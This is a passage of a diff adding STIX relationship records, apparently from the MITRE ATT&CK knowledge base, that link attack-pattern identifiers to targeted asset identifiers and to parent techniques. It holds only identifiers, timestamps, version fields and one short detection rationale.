"2024-06-21T14:12:20.265Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--191cc6af-1bb2-4344-ab5f-28e496638720", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--72fb40ab-7f77-483f-a115-6e29e636c330", + "created": "2024-06-21T14:12:20.255Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.255Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0533ab23-3f7d-463f-9bd8-634d27e4dee1", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--72fbcad9-a7bc-4027-9c56-308c52831eb3", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4a2975db-414e-4c0c-bd92-775987514b4b", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--73093c08-ea39-4956-8bff-55e15f6630cd", + "created": "2023-09-28T20:07:59.785Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:07:59.785Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--731fb0bf-242f-43d3-906e-cb5d9781eb7f", + "created": "2020-02-04T19:17:42.280Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--34e793de-0274-4982-9c1a-246ed1c19dee", + "target_ref": "attack-pattern--65917ae0-b854-4139-83fe-bf2441cf0196", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--732a4852-ea8f-440f-bc3d-e67bf61e1881", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1996eef1-ced3-4d7f-bf94-33298cabbf72", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--732fcc79-b9e1-4eef-aea5-b2eefc883e37", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--09cd431f-eaf4-4d2a-acaf-2a7acfe7ed58", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--733f3114-42cd-4fbc-8549-84f9f8b6863e", + "created": "2024-06-21T14:12:20.261Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.261Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b18eae87-b469-4e14-b454-b171b416bc18", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--734b6d03-d3fc-4e4f-95ce-e655110a463c", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ae676644-d2d2-41b7-af7e-9bed1b55898c", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7354fb0c-a534-49c1-94d2-d52f22f40d46", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7362ff93-8a8d-496e-b052-fb7bffb6144f", + "created": "2024-06-21T14:12:20.263Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.263Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d28ef391-8ed4-45dc-bc4a-2f43abf54416", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--73672e43-5a42-4b6a-934b-a52f57bdd7ac", + "created": "2020-02-10T20:43:10.411Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", + "target_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--736bfcbd-41c1-49e0-b86f-a7f72eda12b5", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--74d2a63f-3c7b-4852-92da-02d8fbab16da", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--73848b83-d589-4ba2-8d63-14db399517c3", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4fe28b27-b13c-453e-a386-c2ef362a573b", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--73856f29-76c5-4420-a411-26cf2cd3f48a", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--356662f7-e315-4759-86c9-6214e2a50ff8", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--73c358d5-f4ce-4ce5-aa3d-d2ede8aff148", + "created": "2024-03-25T20:17:16.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-03-25T20:17:16.271Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1c5cf58c-a34a-40d7-82f4-f987cdfc2b91", + "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--73cc374e-1649-47dc-ae5c-5c86e02b6f1a", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1b7b1806-7746-41a1-a35d-e48dae25ddba", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--73cdbba5-d2f0-49a4-84fb-b031fda36655", + "created": "2020-01-10T18:01:03.848Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--c63a348e-ffc2-486a-b9d9-d7f11ec54d99", + "target_ref": "attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--73de2deb-ade3-4939-b6a0-ea866409fb35", + "created": "2024-06-26T19:26:57.602Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T19:26:57.602Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ebb42bbe-62d7-47d7-a55f-3b08b61d792d", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--73e00823-6dee-4e46-b16e-1bc75cb48501", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--73e218ca-d5db-4371-a28e-6444f5bdd2d6", + "created": "2024-06-21T14:12:20.264Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.264Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--73ffde5d-1cc7-4020-bc55-90fdb266ef16", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cabe189c-a0e3-4965-a473-dcff00f17213", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--740082b7-2411-473a-a59d-4d46cf12f8b5", + "created": "2023-09-29T18:45:01.516Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:45:01.516Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b0628bfc-5376-4a38-9182-f324501cb4cf", + "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--74158e7f-765d-4c49-bc06-b5ccc9a8ad50", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7415d810-f6af-45e9-85d8-0808ce1a71ce", + "created": "2024-07-02T13:55:55.772Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.772Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ea071aa0-8f17-416f-ab0d-2bab7e79003d", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--74192d82-680f-412e-80df-27b86fdfa20c", + "created": "2020-10-20T00:09:33.144Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--818302b2-d640-477b-bf88-873120ce85c4", + "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--741e7670-ecf7-4734-b8fc-6b0e54dbafeb", + "created": "2024-06-26T13:45:27.192Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:45:27.192Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9664ad0e-789e-40ac-82e2-d7b17fbe8fb3", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7425dee3-b650-4e2f-9f7e-dbaf2d02f386", + "created": "2024-06-26T19:23:39.037Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T19:23:39.037Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9fa07bef-9c81-421e-a8e5-ad4366c5a925", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--74265ef8-6bbc-419d-8070-810d1d54f052", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7430b102-ff26-41eb-aa5d-628aeccf07b2", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--851e071f-208d-4c79-adc6-5974c85c78f3", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--745b5268-f2b3-499c-a6a4-63d7e8667ff7", + "created": "2023-09-29T17:57:23.090Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:57:23.090Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", + "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--748388a8-04cd-47d2-9cd7-ea6ffa1f7f36", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cc3502b5-30cc-4473-ad48-42d51a6ef6d1", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--74855658-e1e3-4781-a2bc-a685cf1a77d1", + "created": "2024-05-23T03:47:05.649Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T02:37:01.799Z", + "description": "Asset Mapping Rationale: Detection - Monitor for newly constructed network connections that are sent or received by untrusted hosts or uncommon data flows.", + "relationship_type": "targets", + "source_ref": "attack-pattern--0ad7bc5c-235a-4048-944b-3b286676cb74", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--74b7d705-35d3-43bd-9579-cb84ef99a604", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--74e1568d-563c-4372-9aaa-db3272d16aec", + "created": "2024-06-21T14:12:20.264Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.264Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f0589bc3-a6ae-425a-a3d5-5659bfee07f4", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--74ff9249-dc7f-4402-94b4-8565f2e313ba", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--910906dd-8c0a-475a-9cc1-5e029e2fad58", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7500c71f-8e96-4ef7-9f5e-bb34341531f3", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--21875073-b0ee-49e3-9077-1e2a885359af", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7519f8c9-0db3-441a-bc4c-a909160e1a39", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8c4aef43-48d5-49aa-b2af-c0cd58d30c3d", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--752a240f-cc26-4809-8e1a-87ff5e5ca4ad", + "created": "2024-06-21T14:12:20.263Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.263Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + 